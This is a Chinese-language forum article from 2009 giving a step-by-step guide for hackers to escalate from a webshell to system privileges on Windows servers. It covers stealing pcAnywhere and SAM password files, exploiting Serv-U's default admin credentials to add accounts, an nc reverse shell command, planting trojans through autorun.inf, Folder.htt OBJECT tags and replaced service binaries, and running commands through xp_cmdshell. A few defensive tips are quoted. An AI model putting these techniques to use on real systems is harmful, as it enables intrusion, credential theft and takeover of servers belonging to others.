我要投稿

服務器提權的介紹和方法

時間:2009-12-28 14:20 作者:小艾 閱讀:16070

掃描二維碼關注公眾號,可以查詢淘寶、京東商品優惠券
現在可以說網絡管理員對服務器的設置是越來越BT,但BT的同時,也有黑客朋友們對服務器的不斷的測試,在測試中往往獲取最低的guest權限是簡單的,像我們在入侵網站過程中,獲取webshell是簡單的,但是當由webshell的guest權限向system權限提升時卻往往是止步不前。所以我有想寫這樣一篇文章的想法,但是在思考的過程中,又不得不承認,方法是不斷的探索中出來的,方法更是有常規的也有另辟蹊徑的。下面就做一些簡單的介紹,對提權的方法進行一些介紹,同時也希望在更多朋友的不斷回復中能夠豐富我們的方法。
  首先要說明的是,過早的一些漏洞我們就不再多說了,只說一些現在可以見到的吧。還有就是本文的題目是webshell下的服務器提權方法。
  下面我們就進入主題,對webshell的提權方法!
  首先我們要明確的是,提權一般是依靠主機所開通的服務,利用服務存在的漏洞和管理員設置的疏忽進行提權的,不過也不排除一些SB的管理員對服務器設置的似乎沒有"穿衣服".下面就是針對一些常見的服務進行的提權方法。
  在獲取webshell后,我們常見的是看一下系統的服務,查看服務可以通過利用掃描器對服務器ip進行掃描,或是在webshell中有執行dos命令時查看net start來查看主機所開放的服務。首先我們說一下從簡單的開始說起:
  
  1.pcanywhere的提權方法
  pcanywhere軟件我想大家都了解,為什么將它放在首位就是因為讀取密碼后直接連接就可以了,如果對方主機在開通了pcanywhere的服務端的話,我們看能否跳轉到這個目錄C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下載它的CIF文件,然后使用pcanywhere的密碼讀取器得到pcAnywhere密碼,然后使用pcanywhere登陸即可!接下來就是可視化操作了。
  
  2.Serv-U提權方法
  Serv-u可以說是網絡上比較火的一款FTP服務器軟件,有許多像我這樣的小黑們都是看系統服務中是否有Serv-u的系統進程來進行提權的。Serv-u的提權方法針對不同的版本也有不同的方法,這里我們就列舉一二,可能不是很全,但在其他網友的回復中能夠不斷的補充吧!
  a.serv-U本地提權:serv-U本地提權一般是利用溢出程序對serv-u的設置上的缺陷進行添加超級賬戶的功效。例如Xiaolu寫的serv-u.exe就是利用sevr-u的默認管理端口,管理員賬號和密碼進行提權的,默認本地管理端口是:43958,默認管理員:LocalAdministrator,默認密碼:#[email protected]$ak#.lk;[email protected],這是集成在Serv-u內部的,可以以Guest權限來進行連接,對Serv-u進行管理,利用本地提權的關鍵就是尋找服務器文件目錄中的everyone權限目錄,下面我給大家列舉些常見的everyone權限目錄:
  c:\winnt\system32\inetsrv\data\
  是erveryone 完全控制,很多時候沒作限制,把提升權限的工具上傳上去,然后執行
  c:\prel
  C:\Program Files\Java Web Start\
  c:\Documents and Settings\
  C:\Documents and Settings\All Users\Documents\
  很多時候data目錄不行,試試這個很多主機都是erveryone 完全控制!
  C:\Program Files\Microsoft SQL Server\
  c:\Temp\
  c:\mysql\(如果服務器支持PHP
  c:\PHP(如果服務器支持PHP)
  上面一些目錄就是常見的,不過也不排除一些特殊的,像江民的kv2004對文件夾的權限設置就不是很嚴格的。
  不過針對本地提權是可以防范的,下面是我在xiaolu的文章中節選的:
  防止辦法和對策:
  一般防止方法:設置目錄權限,通過去掉Web目錄iusr用戶的執行權限來防止使用Webshell來運行Exp程序。
  對策:這種方法有一定的局限性,需要設置的目錄很多,不能有一點疏漏,比如我就發現很多虛擬主機在C:\Documents and Settings\All Users\ Documents目錄以及下邊幾個子目錄Documents沒有設置權限,導致可以在這個目錄上傳并運行Exp,這種目錄還有x:\php,x:\perl等,因為這種目錄都是everyone完全控制的。有些主機還支持php,pl,aspx等,這簡直就是服務器的Serv-U災難,^_^,運行程序更加方便。
  高級一點的防止辦法:修改Serv-u管理端口,用Ultraedit打開ServUDaemon.exe查找B6AB(43958的16進制),替換成自己定義的端口比如3930(12345),打開ServUAdmin.exe找到最后一個B6AB替換成3930(12345),啟動Serv-u,現在本地管理端口就成了12345了:
  
  TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING
  
  對策:對付這種也很簡單,netstat –an,就能看到端口了,有人說netstat無法運行,其實你再上傳個netstat.exe到可執行目錄運行就ok了,然后修改一下Exp編譯,上傳運行就好了,我修改了一個可以自定義端口的Exp,運行格式:
  
  USAGE: serv-u.exe port "command"
  Example: serv-u.exe 43958 "net user xl xiaoxue /add"
  
  更高級的防止辦法:修改管理員名和密碼,用Ultraedit打開ServUDaemon.exe查找Ascii:LocalAdministrator,和#[email protected]$ak#.lk;[email protected],修改成等長度的其它字符就可以了,ServUAdmin.exe也一樣處理。
  對策:這下默認的管理員連接不上了,還有辦法么?嘿嘿,有的管理員安裝Serv-u都是使用默認目錄C:\Program Files\Serv-U安裝,這個目錄雖然不能寫,也不能修改,但是默認iusr是可以讀的,我們可以用webshell來下載ServUDaemon.exe,用Ultraedit打開分析一下,Serv-U的帳號密碼就到手了,修改Exp編譯上傳運行,我們又勝利了。
  
  終極防御:
  a.設置好目錄權限,不要疏忽大意;
  b.Serv-U最好不要使用默認安裝路徑,設置Serv-U目錄的權限,只有管理員才能訪問;
  c.用我介紹的辦法修改Serv-U的默認管理員名字和密碼,喜歡的話端口也可以改掉。
  d.serv-U管理端口定向轉發法:這里需要使用的工具是FPipe.exe
  我們要知道Serv-u默認本地管理端口是:43958,這個是只允許本地ip127.0.0.1進行登陸和管理的,那么我們就想能不能通過端口轉向來遠程管理呢?所以我們用到FPipe.exe,首先是將FPipe.exe上傳至服務器中,然后再cmd下執行
  Fpipe.exe -v -l 12345-r 43958 127.0.0.1
  這里要說明的是,這段字符的意思是當訪問12345端口時就會自動轉向43958端口,也就是serv-u的管理端口
  所以我們在本地安裝一個Serv-u,
  新建一個服務器,填入對方IP,
  user:
  LocalAdministrator
  pass:
  #[email protected]$ak#.lk;[email protected]
  連接上后你就可以管理他的Serv-u了,剩下的操作就是執行上面提到的方法了!
  ===================================================
  Serv-U的方法我就總結出這幾個來,可能還有其他的方法我沒有看到吧
  不過個人認為關鍵還是本地溢出漏洞的應用要比較多一些,所以網上也常常出現serv-u的本機溢出程序
  不同版本的更是層出不窮,前一段時間針對serv-u6.0.2的修改了默認管理員賬號和密碼的相關文章還請大家參照校園黑客聯盟的小魚修煉中的文章。
  Serv-U的提權文章就暫時先總結到這里,有更好的方法還請大家回復!
  
  3.Autorun方法:這種方法也可以說是比較古老的方法,最初應該是從光盤自動播放中尋找到的靈感吧?不進行細說,給出格式即可
  制作一個Autoruan.inf文件.內容如下
  [AutoRun]
  open=bear.exe
  bear.exe為木馬程序,與autorun.inf放在同一目錄下!
  
  4.SAM破解方法: 進入C:\WINNT\system32\config\ 下載他的SAM文件用lc等破解工具破解。
  
  
  5.相關腳本提權方法:前面的serv-u的ftp提權中提過的vbs這里再說下.進入c:\Documents and Settings\All Users\「開始」菜單\程序\啟動   寫入bat或vbs文件。這種方法也是屬于守株待兔類的,只有在對方主機重起以后才可以達到目的。
  
  
  6.NC的反彈提權:這里就要說NC的相關用法了,如果在對方服務器中有足夠的權限執行nc的話就好了,把它反彈到自己的電腦上,你就可以進行相關操作了!瑞士軍刀具體方法不多說,給出格式,如下:
  server:nc -e cmd.exe ip 1234
  client: nc -l -p 1234
  
  
  7.conn等asp文件中泄漏SQL帳戶密碼方法:這種方法說起來應該算是比較僥幸的方法。曾經馬俊和我說過一次,原來沒有太在意,現在還真的感覺有些好用了,找到賬號密碼和數據庫名在對方沒有刪除xp_cmdshell條件下用sql連接工具連接即,連接上后就可以輸入你想要的CMD命令了。
  
  
  8.VNC的相關提權:VNC也是一個類似pcanywhere的遠程管理軟件,在linux應用廣泛,曾經在看臺灣的一些服務器中有很多使用VNC的,方法也是我在網絡中學到的,不過在應用中就成功過一次,比較郁悶!方法就轉載一下吧,網址:http://77169.org/Article/HTML/14184.html
  還有要補充的就是vnc是可以反向連接的,這個方法我沒有試過,只是曾經看影子做過一個視頻動畫。
  
  
  9.desktop.ini與Folder.htt方法。(此方法是在網絡看到的)方法如下:首先建立一個文件夾,進入,在空白處點右鍵,選擇“自定義文件夾”一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder
  setting的文件架與desktop.ini的文件,如果看不到,就把顯示所有文件給選上,然后我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼:<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木馬名”></OBJECT> 然后你將你的木馬文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執行了我們的木馬,此方法也屬于類似autorun的守株待兔方法。
  
  
  10.替換服務提權:我認為比較復雜,不過有些時候也實用,首先是看服務進程,在看我們是否有執行命令的權限,這里要用到的命令是rename,相關用法:
  C:\>rename /?
  重命名文件。
  
  RENAME [drive:][path]filename1 filename2.
  REN [drive:][path]filename1 filename2.
  
  例如替換c:\kv2004\kv.exe的進程
  rename c:\kv2004\kv.exe bear.exe
  然后再將我們的本地木馬文件命名為kv.exe上傳到c:\kv2004\目錄下,等待對方重新起動機算機即可!
                                
                                                             QQ:215777400

最新評論

我要投稿 我要評論
插入url鏈接 添加表情
限 100000 字節
響應相關主管單位規定,關閉回帖發帖功能
[VB畢業設計] [ASP畢業設計] [JAVA畢業設計] [JSP畢業設計] [PHP畢業設計] [asp.net畢業設計] [.net畢業設計] [網絡畢業設計] [Delphi畢業設計] [VC畢業設計] [VF畢業設計] [機械畢業設計] [工藝畢業設計] [模具畢業設計] [其他畢業設計]
站長聯系 cccbbsnet#163.com 本站系公益性質網站,站內廣告維系本站運作。歡迎贊助本站。
大學生計算機相關方向|軟件編程|網絡工程|web開發|數據庫技術|學習資料等
本社區僅供學習計算機相關技術所使用,訪客發言不得違反國家法律法規
Time now is:04-10 19:20, Gzip enabled 蜀ICP備07004838號Powered by cccbbs.net v7.5 SP3 Code © 2003-06 cccbbs
計算機畢業設計
配资网